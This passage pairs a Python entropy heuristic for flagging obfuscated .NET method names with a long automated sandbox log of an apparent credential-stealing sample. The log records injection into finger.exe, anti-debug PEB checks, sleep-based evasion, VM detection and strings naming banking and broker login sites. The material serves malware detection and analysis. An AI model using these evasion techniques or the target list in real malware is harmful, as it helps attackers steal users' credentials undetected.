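    """Entropy of all method names of one class joined into a single string,
    which is what 'entropy of concatenated method names' refers to."""
    return shannon_entropy("".join(method_names))


def flag_obfuscated_classes(classes: Dict[str, List[str]],
                            threshold: float = 4.6,
                            min_length: int = 40) -> Dict[str, float]:
    """Return {class_name: entropy} for every class scoring at or above `threshold`.

    Classes whose joined names are shorter than `min_length` are skipped
    because the estimate is too noisy on tiny inputs (assumed cut-off).
    A typical English-like class (CanConvertFrom, ConvertTo, Dispose, ...)
    lands around 4.2 bits; ten renamed 10-character methods land above 5.
    """
    flagged: Dict[str, float] = {}
    for cls, names in classes.items():
        joined = "".join(names)
        if len(joined) < min_length:
            continue
        h = shannon_entropy(joined)
        if h >= threshold:
            flagged[cls] = round(h, 2)
    return flagged


# Two classes copied from the report plus one constructed ordinary class.
SAMPLE_CLASSES: Dict[str, List[str]] = {
    "suHcoIe9AHX695RwfE": ['xuT8yOYelr', 'sRk8c7sLgE', 'dBe8uZmdxB', 'cXFupK4ZEL',
                           'Vq7uzOHnJo', 'pva8YhfYOe', 'QaJ82Jl2KW', 'qUC8JwpMgY',
                           'Qqf8gLAcoF', 'Hxu81yKUtp'],
    "QW4UaspMJGf4pcPukm": ['y6uAcZAV2V', 'CRgAPM2NtU', 'br3AuaN4l7', 'zNaA8g9SUv',
                           'LtqAwSVXvS', 'KbTA7xpfgf', 'Next', 'Next', 'Next', 'NextBytes'],
    "OrdinaryConverter": ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dispose',
                          'ToString', 'ProcessDialogKey', 'Next', 'NextBytes'],
}

if __name__ == "__main__":
    for cls, names in SAMPLE_CLASSES.items():
        print(f"{cls:24s} {name_entropy(names):.2f} bits")
    print("flagged:", flag_obfuscated_classes(SAMPLE_CLASSES))
```

Entropy alone is a triage signal, not proof of malice: legitimate obfuscators (and minified names in some frameworks) score the same way, which is why the report stacks this with the injection, Defender exclusion and credential-theft behaviour rather than relying on it in isolation.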

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe Process information set: NOOPENFILEERRORBOX (42 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (101 occurrences)
                Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: oss4CtI8oz.exe PID: 6728, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D324
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D7E4
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D944
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D504
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D544
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D1E4
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B7630154
                Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762DA44
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: 12F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: 2DA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: 2CA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: 90B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: 7950000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: A0B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: B0B0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0139096E rdtsc
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3154
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 446
                Source: C:\Windows\SysWOW64\finger.exe; Window / User API: threadDelayed 9834
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exe; API coverage: 2.8 %
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe TID: 6784; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772; Thread sleep count: 136 > 30
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772; Thread sleep time: -272000s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772; Thread sleep count: 9834 > 30
                Source: C:\Windows\SysWOW64\finger.exe TID: 6772; Thread sleep time: -19668000s >= -30000s
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768; Thread sleep time: -85000s >= -30000s
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768; Thread sleep count: 37 > 30
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768; Thread sleep time: -55500s >= -30000s
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768; Thread sleep count: 45 > 30
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe TID: 6768; Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5224; Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5228; Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exe; Code function: 7_2_0086CB70 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: nge Transaction PasswordVMware20,11696494690^
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: discord.comVMware20,11696494690f
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: AMC password management pageVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,1)
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: www.interactivebrokers.comVMware20
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: svchost.exe, 0000000A.00000002.2851606177.00000266E4453000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3339421772.0000000000949000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.1379074090.000002AF5AC1C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: oss4CtI8oz.exe, 00000000.00000002.954564043.0000000007208000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: finger.exe, 00000007.00000002.3340993158.0000000004FCE000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000003DFE000.00000004.00000001.00040000.00000000.sdmp; Binary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,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
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: global block list test formVMware20,11696494690
                Source: svchost.exe, 0000000A.00000002.2850550623.00000266DEE2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW@gE
                Source: oss4CtI8oz.exe, 00000000.00000002.966088483.0000000007340000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: v0fKoVMCid
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: finger.exe, 00000007.00000002.3343159690.0000000007B74000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CDYNVMware20,11696494690p
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 4ub-1K1Qxn.7.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\finger.exe; Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0139096E rdtsc
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00417E13 LdrLoadDll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01380124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013FA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01410115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_014261E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01390185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013801F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0140C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01352050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013920F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013580E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_014160B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_014160B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0141A352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01370310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0140C3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]
